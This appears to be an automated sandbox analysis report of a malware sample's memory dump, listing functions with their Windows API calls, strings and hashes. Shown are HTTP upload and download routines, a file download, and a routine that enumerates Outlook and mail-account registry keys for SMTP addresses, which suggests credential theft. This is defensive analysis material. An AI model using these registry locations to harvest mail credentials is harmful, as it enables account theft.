                                                                                                                                                    • Opcode Fuzzy Hash: c4b4fe4a70f4dc59050e505b2f8b4ab6900bbe7a42c48d05927e6a911eb00426
                                                                                                                                                    • Instruction Fuzzy Hash: EDB1F3B1644B00CFD375CF19C890A62B7F0EB49314B248A5ED8AACBB51D739E886CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00435E43, Relevance: 6.4, APIs: 4, Instructions: 354registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00435E48
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?,?,?,00000000), ref: 00435EE8
                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?,00000000), ref: 00435F36
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00435F3F
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseDeallocateH_prologOpenQueryValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2130659939-0
                                                                                                                                                    • Opcode ID: c3e5ff4fae5538e74c8b7fe1d2706364bfddd4f55b9b55ba7f47c6c027be2e7c
                                                                                                                                                    • Instruction ID: bab3fd2c1994ddc0d5a2d853f3e5385b9ce07ac324d1f50fa3dfbcc6af4e12de
                                                                                                                                                    • Opcode Fuzzy Hash: c3e5ff4fae5538e74c8b7fe1d2706364bfddd4f55b9b55ba7f47c6c027be2e7c
                                                                                                                                                    • Instruction Fuzzy Hash: 38D116B0D002599EEF15DFA9C890BEFBBB8AF15304F10915FD456B3282D7385A48CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00432ADB, Relevance: 33.6, APIs: 17, Strings: 2, Instructions: 308timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00432AE0
                                                                                                                                                    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00487758,00000000,00000000), ref: 00432B20
                                                                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?), ref: 00432BEC
                                                                                                                                                      • Part of subcall function 0043770F: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,00433066,?,00000001,00000000,00000002,00000080), ref: 00437734
                                                                                                                                                      • Part of subcall function 0043770F: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,00433066,?,00000001,00000000), ref: 0043777B
                                                                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?), ref: 00432C3E
                                                                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?), ref: 00432CC5
                                                                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?), ref: 00432D37
                                                                                                                                                    • WinHttpSetTimeouts.WINHTTP(00000000,00000BB8,00000BB8,00007530,00007530,?,00000000,00000000,00000000,00000000,00000100,?), ref: 00432D67
                                                                                                                                                    • _strlen.LIBCMT ref: 00432D78
                                                                                                                                                    • _strlen.LIBCMT ref: 00432D82
                                                                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000100,?), ref: 00432D97
                                                                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,00000000,00000000,00000000,00000000,00000100,?), ref: 00432DA7
                                                                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,00000000,00000000,00000000,00000000,00000100,?), ref: 00432DBD
                                                                                                                                                    • WinHttpReadData.WINHTTP(00000000,00000000,?,?,00000000,00000000,00000100,?), ref: 00432DE7
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000100,?), ref: 00432E9D
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?), ref: 00432EA6
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00432EB0
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(?), ref: 00432EBA
                                                                                                                                                    Strings
                                                                                                                                                    • Content-Type: text/plain; charset=UTF-8, xrefs: 00432D91
                                                                                                                                                    • %99[^:]://%99[^/]%99[^], xrefs: 00432B46
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableErrorH_prologLastQueryReadReceiveResponseSendTimeouts
                                                                                                                                                    • String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8
                                                                                                                                                    • API String ID: 2655695305-3818427525
                                                                                                                                                    • Opcode ID: d481e16c01527dc99aa614ea3aead1bc6af9e3b65c08f6aef511b42fe3d49dbc
                                                                                                                                                    • Instruction ID: d562e74d7a9daed82a7f3cbfe042dd8741f03c4c53bdb4524389fddb22928add
                                                                                                                                                    • Opcode Fuzzy Hash: d481e16c01527dc99aa614ea3aead1bc6af9e3b65c08f6aef511b42fe3d49dbc
                                                                                                                                                    • Instruction Fuzzy Hash: E7C16E71D00218EFDB15DF95C985AEEBBB8EF09304F1040AEE409A7251DB789B89CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00432EE5, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 276fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00432EEA
                                                                                                                                                    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00486A80,0000000F,004868B8), ref: 00432F28
                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00432F4C
                                                                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 0043301A
                                                                                                                                                      • Part of subcall function 0043770F: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,00433066,?,00000001,00000000,00000002,00000080), ref: 00437734
                                                                                                                                                      • Part of subcall function 0043770F: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,00433066,?,00000001,00000000), ref: 0043777B
                                                                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00433074
                                                                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 004330EC
                                                                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 00433153
                                                                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00433183
                                                                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 0043318F
                                                                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 004331A4
                                                                                                                                                    • WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 004331CF
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,DCDCC057,00000000), ref: 004331E4
                                                                                                                                                    • GetLastError.KERNEL32 ref: 004331FF
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00433206
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00433210
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000001,00000000,00000002,00000080,00000000), ref: 00433219
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(?), ref: 00433220
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
                                                                                                                                                    • String ID: %99[^:]://%99[^/]%99[^]$GET
                                                                                                                                                    • API String ID: 4006077129-3478069819
                                                                                                                                                    • Opcode ID: 9f1917755ee18121c9f403ea5f8fda2db85f455ce42b3e6e3b1855359f3dc7ad
                                                                                                                                                    • Instruction ID: fcfb41bffc54cd3d38fc0882e6382d187c0b259b2983cb7b162928eb89906de0
                                                                                                                                                    • Opcode Fuzzy Hash: 9f1917755ee18121c9f403ea5f8fda2db85f455ce42b3e6e3b1855359f3dc7ad
                                                                                                                                                    • Instruction Fuzzy Hash: FCA17271900258EFDB11DFA4CC85BEEBB78FF09305F1040AAE405A7241EB785E85CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00433D6F, Relevance: 28.6, APIs: 3, Strings: 16, Instructions: 102stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004333DD: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00433D8A,00000001,?,?,?,00433EC3), ref: 0043341C
                                                                                                                                                      • Part of subcall function 004333DD: GetProcAddress.KERNEL32(00000000,?), ref: 00433457
                                                                                                                                                      • Part of subcall function 004333DD: FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00433D8A,00000001,?,?,?,00433EC3), ref: 0043348B
                                                                                                                                                      • Part of subcall function 00433837: RegOpenKeyExW.KERNEL32(80000001,00433EC3,00000000,00020019,00433EC3,?,?,00433D99,00000001,?,?,?,00433EC3), ref: 0043385C
                                                                                                                                                      • Part of subcall function 00433837: RegEnumKeyExW.ADVAPI32(00433EC3,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00433D99,00000001), ref: 004338ED
                                                                                                                                                      • Part of subcall function 00433837: RegCloseKey.ADVAPI32(00433EC3,?,?,00433D99,00000001,?,?,?,00433EC3), ref: 004338FA
                                                                                                                                                      • Part of subcall function 00433904: RegOpenKeyExW.KERNEL32(80000001,00433EC3,00000000,00020019,00433EC3,?,?,?,00433DAD,Identities,00000001,?,?,?,00433EC3), ref: 0043392B
                                                                                                                                                      • Part of subcall function 00433904: RegEnumKeyExW.ADVAPI32(00433EC3,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00433DAD,Identities,00000001), ref: 00433956
                                                                                                                                                      • Part of subcall function 00433904: lstrlenW.KERNEL32(00433EC3,00000000,?,?,?,00433DAD,Identities,00000001,?,?,?,00433EC3), ref: 0043396D
                                                                                                                                                      • Part of subcall function 00433904: lstrlenW.KERNEL32(?,00000000,?,?,?,00433DAD,Identities,00000001,?,?,?,00433EC3), ref: 0043397A
                                                                                                                                                      • Part of subcall function 00433904: lstrcpyW.KERNEL32 ref: 0043399B
                                                                                                                                                      • Part of subcall function 00433904: lstrcatW.KERNEL32(00000000,0047B534), ref: 004339A7
                                                                                                                                                      • Part of subcall function 00433904: lstrcatW.KERNEL32(00000000,?), ref: 004339B5
                                                                                                                                                      • Part of subcall function 00433904: lstrcatW.KERNEL32(00000000,?), ref: 004339C1
                                                                                                                                                      • Part of subcall function 00433904: RegEnumKeyExW.ADVAPI32(00433EC3,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00433DAD,Identities,00000001), ref: 004339FB
                                                                                                                                                      • Part of subcall function 00433904: RegCloseKey.ADVAPI32(00433EC3,?,?,?,00433DAD,Identities,00000001,?,?,?,00433EC3), ref: 00433A10
                                                                                                                                                      • Part of subcall function 0043434E: RegOpenKeyExW.KERNEL32(80000001,00433EC3,00000000,00000100,00000100,?,SMTP Email Address,0047B1F0), ref: 00434396
                                                                                                                                                      • Part of subcall function 0043434E: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004343B5
                                                                                                                                                      • Part of subcall function 0043434E: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004343F0
                                                                                                                                                      • Part of subcall function 0043434E: RegCloseKey.ADVAPI32(00000100), ref: 00434411
                                                                                                                                                    • lstrlenW.KERNEL32(00000000,?,?,?,00433EC3), ref: 00433DD1
                                                                                                                                                    • lstrcpyW.KERNEL32 ref: 00433DE9
                                                                                                                                                    • lstrcpyW.KERNEL32 ref: 00433DF5
                                                                                                                                                      • Part of subcall function 00433837: lstrlenW.KERNEL32(00433EC3,?,?,00433D99,00000001,?,?,?,00433EC3), ref: 00433882
                                                                                                                                                      • Part of subcall function 00433837: lstrcpyW.KERNEL32 ref: 0043389F
                                                                                                                                                      • Part of subcall function 00433837: lstrcatW.KERNEL32(00000000,0047B534), ref: 004338AB
                                                                                                                                                      • Part of subcall function 00433837: lstrcatW.KERNEL32(00000000,?), ref: 004338B9
                                                                                                                                                      • Part of subcall function 004443B8: _free.LIBCMT ref: 004443CB
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00433E41
                                                                                                                                                    • \Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00433D99
                                                                                                                                                    • Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 00433E9B
                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 00433E33
                                                                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 00433E6B
                                                                                                                                                    • Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 00433E5D
                                                                                                                                                    • \Accounts, xrefs: 00433DEF
                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00433E16
                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 00433E28
                                                                                                                                                    • Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 00433E87
                                                                                                                                                    • Identities, xrefs: 00433DA3
                                                                                                                                                    • Software\Microsoft\Internet Account Manager, xrefs: 00433DB7
                                                                                                                                                    • Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00433E4F
                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 00433E79
                                                                                                                                                    • Outlook, xrefs: 00433DB2
                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00433D8D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
                                                                                                                                                    • String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
                                                                                                                                                    • API String ID: 527226083-92925148
                                                                                                                                                    • Opcode ID: aa1adfa243c3c92c66cf17b368ebd4710183bf49459fff01a03f76c8893bef70
                                                                                                                                                    • Instruction ID: 5bc8863b56fbad5606299b573878fefdffb72006126de5fa3fd9345c239533f1
                                                                                                                                                    • Opcode Fuzzy Hash: aa1adfa243c3c92c66cf17b368ebd4710183bf49459fff01a03f76c8893bef70
                                                                                                                                                    • Instruction Fuzzy Hash: 0A314AB150020CFEA708FBA28C87FFEB7A8DE54759F20545EB10512191EBA81F45CAA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00462F21, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00462BDA: CreateFileW.KERNEL32(00000000,00000000,?,00462FCA,?,?,00000000,?,00462FCA,00000000,0000000C), ref: 00462BF7
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00463035
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0046303C
                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00463048
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00463052
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0046305B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0046307B
                                                                                                                                                    • CloseHandle.KERNEL32(004595F3), ref: 004631C8
                                                                                                                                                    • GetLastError.KERNEL32 ref: 004631FA
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00463201
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                    • String ID: H
                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                    • Opcode ID: 7125306330c84fe741e909472f43df993952144f4799a4571dfe07db0de1339b
                                                                                                                                                    • Instruction ID: 3ced52ba5f23423835fe662b1c03eabf308c676a027b35e7f562b0fcfaf1844d
                                                                                                                                                    • Opcode Fuzzy Hash: 7125306330c84fe741e909472f43df993952144f4799a4571dfe07db0de1339b
                                                                                                                                                    • Instruction Fuzzy Hash: 9DA13732A001449FDF199F68DC517AE3BA0EB06324F14015FE811AF392EB789D56CB5B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041D95C, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 188filetimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _strcat.LIBCMT ref: 0041DA1A
                                                                                                                                                    • wsprintfA.USER32 ref: 0041DA74
                                                                                                                                                    • wsprintfA.USER32 ref: 0041DA95
                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 0041DAC4
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0041DB36
                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 0041DB70
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0041DB80
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$wsprintf$CloseCreateHandleTimeWrite_strcat
                                                                                                                                                    • String ID: %s%s$%s%s%s$:
                                                                                                                                                    • API String ID: 840165387-3034790606
                                                                                                                                                    • Opcode ID: fe6f90053a8e957163526c194510766e80d52bf8ba38f70979d43be97bd9be7b
                                                                                                                                                    • Instruction ID: 89731e3aa8d37dec2379b537e2add2af211a0328aa7df0da7492deabb0f65df7
                                                                                                                                                    • Opcode Fuzzy Hash: fe6f90053a8e957163526c194510766e80d52bf8ba38f70979d43be97bd9be7b
                                                                                                                                                    • Instruction Fuzzy Hash: A66126F19082089BCB20DF24C880BEA7769EF44344F1044ABE59A97291D738AEC6CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004378AC, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 004378BE
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004378C5
                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 004378DF
                                                                                                                                                    • GetLastError.KERNEL32 ref: 004378E9
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 004378F9
                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 0043790D
                                                                                                                                                    • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437921
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00437941
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                                                                                                                    • String ID: S-1-5-18
                                                                                                                                                    • API String ID: 857934279-4289277601
                                                                                                                                                    • Opcode ID: 6fdde89e98c4bb4aceb5695dd0c7277a4da48d72a29aff8a95fc686b94b4f2b6
                                                                                                                                                    • Instruction ID: 0db50e0b2077d806859cca16754aa878fe95c8be269ac58e1a9d546917300a68
                                                                                                                                                    • Opcode Fuzzy Hash: 6fdde89e98c4bb4aceb5695dd0c7277a4da48d72a29aff8a95fc686b94b4f2b6
                                                                                                                                                    • Instruction Fuzzy Hash: 2C1130B6904108BBEB209BA2DC08F9F7F7CEF48761F205066F511E1150EB748A44DBAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00433904, Relevance: 15.1, APIs: 10, Instructions: 102stringregistryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,00433EC3,00000000,00020019,00433EC3,?,?,?,00433DAD,Identities,00000001,?,?,?,00433EC3), ref: 0043392B
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(00433EC3,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00433DAD,Identities,00000001), ref: 00433956
                                                                                                                                                    • lstrlenW.KERNEL32(00433EC3,00000000,?,?,?,00433DAD,Identities,00000001,?,?,?,00433EC3), ref: 0043396D
                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,?,?,?,00433DAD,Identities,00000001,?,?,?,00433EC3), ref: 0043397A
                                                                                                                                                    • lstrcpyW.KERNEL32 ref: 0043399B
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,0047B534), ref: 004339A7
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 004339B5
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 004339C1
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(00433EC3,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00433DAD,Identities,00000001), ref: 004339FB
                                                                                                                                                    • RegCloseKey.ADVAPI32(00433EC3,?,?,?,00433DAD,Identities,00000001,?,?,?,00433EC3), ref: 00433A10
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3646165539-0
                                                                                                                                                    • Opcode ID: e340c55206b6eb275293fa89d431a6eac350bd9db22a1607cad90673b14fb966
                                                                                                                                                    • Instruction ID: e94cc72c65e4adcb5d204bf2866b5743fb231c1311d575bdc30dba457deea1f2
                                                                                                                                                    • Opcode Fuzzy Hash: e340c55206b6eb275293fa89d431a6eac350bd9db22a1607cad90673b14fb966
                                                                                                                                                    • Instruction Fuzzy Hash: C53141B2900249BBDB109F91DC48EFF7BBCEF85755F00406AF505E2210EBB89E85DA65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004174E1, Relevance: 14.7, APIs: 5, Strings: 3, Instructions: 656memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 004174E6
                                                                                                                                                      • Part of subcall function 0041932A: __EH_prolog.LIBCMT ref: 0041932F
                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000208,?), ref: 00417530
                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000000,00000000), ref: 00417548
                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,?,?), ref: 004175A8
                                                                                                                                                      • Part of subcall function 0040C112: __EH_prolog.LIBCMT ref: 0040C117
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$Path$AllocCombineDeallocateFolderLocalSpecial
                                                                                                                                                    • String ID: Zlaahy~$($@
                                                                                                                                                    • API String ID: 1910301958-2940542015
                                                                                                                                                    • Opcode ID: 04a63b90ab34dc99f1bace0d6d2c507199e44ecc5c8de5efbd4f509de7249680
                                                                                                                                                    • Instruction ID: 072beee8d0f2430793ef4d7e910d8daf8e76bef61a2da670834eb7e9a6d8afbd
                                                                                                                                                    • Opcode Fuzzy Hash: 04a63b90ab34dc99f1bace0d6d2c507199e44ecc5c8de5efbd4f509de7249680
                                                                                                                                                    • Instruction Fuzzy Hash: DF523670D002589BDF15EFA5C891BEDBBB5AF58304F10409EE40A77282DB786B89CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00458238, Relevance: 13.8, APIs: 9, Instructions: 301COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 41664276be12cfb182aa496c1b6e85821cf6e78c1f9f62aad42bfd2ec9e716fd
                                                                                                                                                    • Instruction ID: 3a19021a0b70768cb0588b0221d5978e14ab7fcb61592ddab42a01e5e116739f
                                                                                                                                                    • Opcode Fuzzy Hash: 41664276be12cfb182aa496c1b6e85821cf6e78c1f9f62aad42bfd2ec9e716fd
                                                                                                                                                    • Instruction Fuzzy Hash: 54C1BF70D04249ABEB11CF99D880BAE7BB0AF49305F04405EED50B7393DF789945CB6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041707B, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 302COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00417080
                                                                                                                                                      • Part of subcall function 0040C112: __EH_prolog.LIBCMT ref: 0040C117
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                      • Part of subcall function 004341EF: __EH_prolog.LIBCMT ref: 004341F4
                                                                                                                                                      • Part of subcall function 004341EF: _strcat.LIBCMT ref: 0043424F
                                                                                                                                                      • Part of subcall function 0040CA14: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,0041763F,00000000,?), ref: 0040CA28
                                                                                                                                                      • Part of subcall function 0040CA14: CreateDirectoryTransactedA.KERNEL32 ref: 0040CA41
                                                                                                                                                      • Part of subcall function 0040CA14: CommitTransaction.KTMW32(00000000,?,0041763F,00000000,?), ref: 0040CA4C
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                      • Part of subcall function 004157B4: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000010,?,00000000,?,?,00417DF5,?,?,00000000), ref: 004157CA
